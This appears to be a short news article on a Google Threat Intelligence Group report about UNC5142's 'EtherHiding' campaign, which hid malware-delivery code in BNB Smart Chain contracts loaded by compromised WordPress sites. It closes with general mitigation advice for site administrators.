Hackers Exploit Blockchain Technology to Spread Malware Through WordPress Sites

A sophisticated hacking group known as UNC5142 has been leveraging blockchain smart contracts for malicious purposes to distribute dangerous malware through compromised WordPress websites, according to a new report from Google Threat Intelligence Group (GTIG). The campaign, discovered in June 2025, has affected approximately 14,000 web pages.

The threat actors utilize a technique called "EtherHiding," which conceals malicious code within the BNB Smart Chain blockchain, making it harder for security systems to detect and remove the threats. This operation primarily distributes information-stealing malware targeting multiple operating systems, including Atomic, Lumma, Rhadamanthys, and Vidar, targeting both Windows and macOS systems.

Sophisticated Multi-Stage Attack Process

The hackers employ a complex JavaScript downloader called CLEARSHORT to execute their attacks. The process begins when compromised WordPress sites face security vulnerabilities that load malicious JavaScript code that interacts with smart contracts stored on the blockchain. These contracts then direct users to deceptive landing pages that trick them into running harmful commands.

The attack chain has evolved significantly since its inception. In late 2024, UNC5142 upgraded their infrastructure to use a three-smart contract system, implementing a Router-Logic-Storage architecture that allows for quick updates to their attack parameters while maintaining operational resilience.

Advanced Blockchain Exploitation Techniques

The campaign's sophistication presents significant challenges for cybersecurity professionals and website owners. The abuse of blockchain technology provides several advantages to the attackers:

• Blends with legitimate Web3 activity
• Increases resistance to traditional detection methods
• Allows for rapid payload updates at minimal cost ($0.25-$1.50 per change)
• Provides enhanced operational agility

Mitigation Strategies and Security Measures

While Google reports no observed UNC5142 activity since July 23, 2025, website administrators should implement comprehensive security measures including:

1. Regular updates of WordPress installations and plugins
2. Implementation of strong security measures to prevent initial compromise
3. Enhanced monitoring of site behavior for unexpected blockchain interactions
4. Implementation of Web Application Firewalls (WAFs)
5. Regular security audits focusing on blockchain-related activities

The emergence of this sophisticated attack method demonstrates how cybercriminals continue to innovate, combining legitimate technologies with social engineering to create more effective attack vectors. As blockchain technology becomes more prevalent, security professionals must adapt their defensive strategies accordingly.

For more detailed information about blockchain-based attacks, visit the OWASP Smart Contract Security Guidelines.